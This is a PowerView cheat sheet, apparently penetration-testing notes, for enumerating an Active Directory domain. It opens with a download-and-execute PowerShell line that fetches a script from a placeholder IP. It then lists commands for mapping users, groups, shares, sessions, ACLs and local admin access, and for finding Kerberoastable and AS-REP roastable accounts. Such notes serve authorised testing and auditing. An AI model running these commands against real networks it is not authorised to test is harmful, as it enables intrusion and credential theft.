🔎Powerview

IEX (New-Object System.Net.WebClient).DownloadString('http://<ip>/PowerView.ps1')
Import-Module .\PowerView.ps1

Loading the module into PowerShell; if this gives an error, change the execution policy.

  • Basic information about the domain:

Get-NetDomain
  • List of all users in the domain:

Get-NetUser

The output of the above command can be filtered with the "select" (Select-Object) command. For example,

Get-NetUser | select cn

Here cn is one of the property names (column headings) in the output of the previous command; any number of properties can be selected, separated by commas.

  • Specific User

Get-NetUser "user"
  • Enumerate domain groups

Get-NetGroup
  • Information from specific group

Get-NetGroup "group name"
  • Enumerate the computer objects in the domain

Get-NetComputer
  • Scans the network to determine whether our current user has administrative permissions on any computer in the domain

Find-LocalAdminAccess
  • Checking logged-on users with Get-NetSession; adding -Verbose gives more information.

Get-NetSession -ComputerName files04 -Verbose
  • Listing SPN accounts in domain

Get-NetUser -SPN | select samaccountname,serviceprincipalname
  • Enumerates the ACEs (access control entries) on an object and lists the SIDs (security identifiers) involved, such as SecurityIdentifier and ObjectSID

Get-ObjectAcl -Identity <user>
  • Converting SID/ObjSID to name

Convert-SidToName <sid/objsid>
  • Checking for the "GenericAll" right on a specific group; the SIDs obtained can then be converted to names with Convert-SidToName

Get-ObjectAcl -Identity "group-name" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
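Putting the previous two items together, as an added example that is not from the original notes: a small PowerShell function (hypothetical name Get-GenericAllHolders) that lists who holds GenericAll over a group and resolves each SID with Convert-SidToName, so unexpected principals can be spotted during an audit. It assumes PowerView.ps1 is already imported and uses a placeholder group name.

```powershell
# Added example, not part of the original notes.
# Assumes PowerView.ps1 has been imported (Get-ObjectAcl, Convert-SidToName).
function Get-GenericAllHolders {
    param([Parameter(Mandatory)][string]$GroupName)

    Get-ObjectAcl -Identity $GroupName |
        Where-Object { $_.ActiveDirectoryRights -eq 'GenericAll' } |
        ForEach-Object {
            # SecurityIdentifier is a SID object; interpolating gives its "S-1-5-..." string form
            $sid = "$($_.SecurityIdentifier)"
            [PSCustomObject]@{
                Group     = $GroupName
                HolderSID = $sid
                Holder    = Convert-SidToName $sid   # resolve SID to DOMAIN\name
                Rights    = $_.ActiveDirectoryRights
            }
        }
}

# Usage: 'PLACEHOLDER-GROUP' is a placeholder; review the Holder column for
# principals that should not have full control (e.g. broad groups like Domain Users).
Get-GenericAllHolders -GroupName 'PLACEHOLDER-GROUP' | Format-Table -AutoSize
```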
  • Find the shares in the domain

Find-DomainShare
  • Identifying AS-REP roastable accounts

Get-DomainUser -PreauthNotRequired -Verbose
  • Kerberoastable accounts

Get-NetUser -SPN | select serviceprincipalname
